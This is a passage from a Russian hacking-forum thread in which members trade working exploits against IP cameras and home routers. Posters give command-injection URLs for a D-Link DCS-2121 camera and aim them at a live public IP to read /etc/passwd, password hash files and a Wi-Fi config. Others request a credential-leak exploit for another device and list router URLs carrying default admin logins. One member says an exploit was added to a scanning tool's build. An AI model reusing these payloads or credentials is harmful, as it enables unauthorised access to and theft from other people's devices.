HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3761  
Старый 18.07.2017, 21:56
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от sha9  

нельзя-ли в новую сборку добавить камеру D-Link DCS-2121?

эксплойт

http://_IP_/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd

Мало толку от эксплойта, пароль хеширован:

Код:
auth.backend = "htdigest"
auth.backend.htdigest.userfile = "/tmp/lighttpd-htdigest.user"
http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/lighttpd-htdigest.user

Единственная вкуснятина:

http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/rt61sta.dat

Если есть идеи, как добыть больше инфы - велком.
 
Ответить с цитированием

  #3762  
Старый 18.07.2017, 22:43
exzet
Active Member
Регистрация: 26.05.2017
Сообщений: 67
Провел на форуме:
18821

Репутация: 0
По умолчанию

Цитата:
Сообщение от pkrw88  

Вполне себе заходит

По этой ссылке http://178.168.17.82:81/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd

 
Ответить с цитированием

  #3763  
Старый 19.07.2017, 18:47
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от exzet  

Забыл добавить, что если залогиниться, то по ссылке 178.168.17.82:81/common/info.cgi можно получить некоторую инфу

В принципе, после успешного логина достаточно GETнуть страницу /eng/admin/st_device.cgi, и там будет инфа в формате XML:

Код:
D-Link
DCS-2121
И тому подобное.

Эксплойт добавил.
 
Ответить с цитированием

  #3764  
Старый 21.07.2017, 11:01
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от Pebenok70  

На данный момент, получается только руками перебирать? А в базу как их потом добавить? У нас много их появилось.

Как только ночную сборку выпущу, так можно будет и в базу добавлять. Скорее всего уже на этих выходных будет.
 
Ответить с цитированием

  #3765  
Старый 21.07.2017, 14:01
Felis-Sapiens
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме:
109967

Репутация: 171


По умолчанию

Цитата:
Сообщение от sha9  

в ночную сборку можно внести еще один эксплойт?

http://IP/system.ini?loginuse&loginpas'|xxd|less

https://forum.antichat.ru/threads/398971/page-146#post-4061013
 
Ответить с цитированием

  #3766  
Старый 21.07.2017, 14:04
sha9
Постоянный
Регистрация: 25.09.2015
Сообщений: 562
Провел на форуме:
168564

Репутация: 2


По умолчанию

Цитата:
Сообщение от Felis-Sapiens  

https://forum.antichat.ru/threads/398971/page-146#post-4061013

понял.был невнимателен. пост удаляю...
 
Ответить с цитированием

  #3767  
Старый 21.07.2017, 15:54
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от Upsurt  


Я недавно фиксил все DI-524, можно в виде текста под спойлер?

С картинки вводить айпишки напрягает.
 
Ответить с цитированием

  #3768  
Старый 21.07.2017, 16:01
Upsurt
Member
Регистрация: 16.08.2015
Сообщений: 105
Провел на форуме:
20682

Репутация: 0
По умолчанию

Цитата:
Сообщение от binarymaster  

Я недавно фиксил все DI-524, можно в виде текста под спойлер?

С картинки вводить айпишки напрягает.

Ok

http://[email protected]:80

http://[email protected]:80

http://[email protected]:80
 
Ответить с цитированием

  #3769  
Старый 21.07.2017, 16:37
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от Upsurt  

Ok

Всё парсит:

 
Ответить с цитированием

  #3770  
Старый 21.07.2017, 16:50
Upsurt
Member
Регистрация: 16.08.2015
Сообщений: 105
Провел на форуме:
20682

Репутация: 0
По умолчанию

TOTOLINK N151RT

http://admin:[email protected]:8080

http://admin:[email protected]:80
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.